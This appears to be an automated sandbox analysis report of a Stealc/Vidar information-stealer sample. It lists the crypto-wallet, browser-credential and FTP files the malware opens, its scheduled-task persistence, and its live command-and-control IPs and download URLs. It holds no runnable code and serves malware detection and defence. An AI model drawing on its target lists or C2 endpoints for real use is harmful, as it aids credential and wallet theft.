Source: Pct.pif, 0000000B.00000002.3804413256.0000000000265000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: Pct.pif, 0000000B.00000002.3804413256.000000000026F000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: Pct.pif, 0000000B.00000002.3804413256.000000000026F000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: Exodus
Source: Pct.pif, 0000000B.00000002.3804413256.0000000000272000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: sst.mys\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*.
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: Pct.pif, 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: my.sst45.145.4.234/ce4b71a59f4ee761.phpoge\\multidoge.wallet/
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: keystore
Source: Pct.pif, 0000000B.00000002.3804413256.000000000023A000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pif File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: Pct.pif Binary or memory string: WIN_81
Source: Pct.pif Binary or memory string: WIN_XP
Source: Pct.pif Binary or memory string: WIN_XPe
Source: Pct.pif Binary or memory string: WIN_VISTA
Source: Pct.pif Binary or memory string: WIN_7
Source: Pct.pif Binary or memory string: WIN_8
Source: Pct.pif.2.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Stealc
Source: Yara match File source: 11.3.Pct.pif.1b79858.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Pct.pif.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Pct.pif.1a82888.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.Pct.pif.1a82888.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3807123175.0000000001BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594009510.0000000001EB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3593733373.0000000001C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594534889.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3806737898.0000000001AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594226622.0000000001B2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594226622.0000000001B79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3593810174.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3806641933.0000000001A6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3594181599.0000000001AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3804413256.00000000001E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3593856204.0000000001B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.3593733373.0000000001BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: Pct.pif PID: 6312, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527287 Sample: file.exe Startdate: 06/10/2024 Architecture: WINDOWS Score: 100 60 sst.my 2->60 62 hFXSqazHOXBOkJfWqLCELfcAYW.hFXSqazHOXBOkJfWqLCELfcAYW 2->62 64 18.31.95.13.in-addr.arpa 2->64 72 Suricata IDS alerts for network traffic 2->72 74 Found malware configuration 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 9 other signatures 2->78 12 file.exe 23 2->12         started        14 oobeldr.exe 2->14         started        signatures3 process4 signatures5 17 cmd.exe 2 12->17         started        96 Antivirus detection for dropped file 14->96 98 Multi AV Scanner detection for dropped file 14->98 100 Detected unpacking (changes PE section rights) 14->100 102 Switches to a custom stack to bypass stack traces 14->102 21 schtasks.exe 1 14->21         started        process6 file7 48 C:\Users\user\AppData\Local\Temp\...\Pct.pif, PE32 17->48 dropped 70 Drops PE files with a suspicious file extension 17->70 23 Pct.pif 37 17->23         started        28 cmd.exe 2 17->28         started        30 conhost.exe 17->30         started        34 7 other processes 17->34 32 conhost.exe 21->32         started        signatures8 process9 dnsIp10 66 sst.my 103.6.198.219, 443, 63886 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 23->66 68 45.145.4.234, 63885, 63887, 80 ALEXHOSTMD Russian Federation 23->68 52 C:\Users\user\AppData\...\softokn3[1].dll, PE32 23->52 dropped 54 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 23->54 dropped 56 C:\Users\user\AppData\...\mozglue[1].dll, PE32 23->56 dropped 58 11 other files (7 malicious) 23->58 dropped 88 Found many strings related to Crypto-Wallets (likely being stolen) 23->88 90 Tries to harvest and steal ftp login credentials 23->90 92 Tries to harvest and steal browser information (history, passwords, etc) 23->92 94 Tries to steal Crypto Currency Wallets 23->94 36 cmd.exe 1 23->36         started        file11 signatures12 process13 process14 38 KFCFBFHIEB.exe 1 36->38         started        42 conhost.exe 36->42         started        file15 50 C:\Users\user\AppData\Roaming\...\oobeldr.exe, MS-DOS 38->50 dropped 80 Antivirus detection for dropped file 38->80 82 Multi AV Scanner detection for dropped file 38->82 84 Detected unpacking (changes PE section rights) 38->84 86 2 other signatures 38->86 44 schtasks.exe 1 38->44         started        signatures16 process17 process18 46 conhost.exe 44->46         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
103.6.198.219
 sst.my Malaysia
46015 EXABYTES-AS-APExaBytesNetworkSdnBhdMY true
45.145.4.234
 unknown Russian Federation
200019 ALEXHOSTMD true

Contacted Domains

Name IP Active
sst.my 103.6.198.219 true
18.31.95.13.in-addr.arpa unknown unknown
hFXSqazHOXBOkJfWqLCELfcAYW.hFXSqazHOXBOkJfWqLCELfcAYW unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://45.145.4.234/bc17a177456805bc/msvcp140.dll true
    		unknown
    http://45.145.4.234/ true
      		unknown
      http://45.145.4.234/bc17a177456805bc/freebl3.dll true
        		unknown
        https://sst.my/folder/l3.exe false
          		unknown
          http://45.145.4.234/ce4b71a59f4ee761.php true
            		unknown
            http://45.145.4.234/bc17a177456805bc/mozglue.dll true
              		unknown
              http://45.145.4.234/bc17a177456805bc/sqlite3.dll true
                		unknown
                http://45.145.4.234/bc17a177456805bc/softokn3.dll true
                  		unknown
                  http://45.145.4.234/bc17a177456805bc/vcruntime140.dll true
                    		unknown
                    http://45.145.4.234/bc17a177456805bc/nss3.dll true
                      		unknown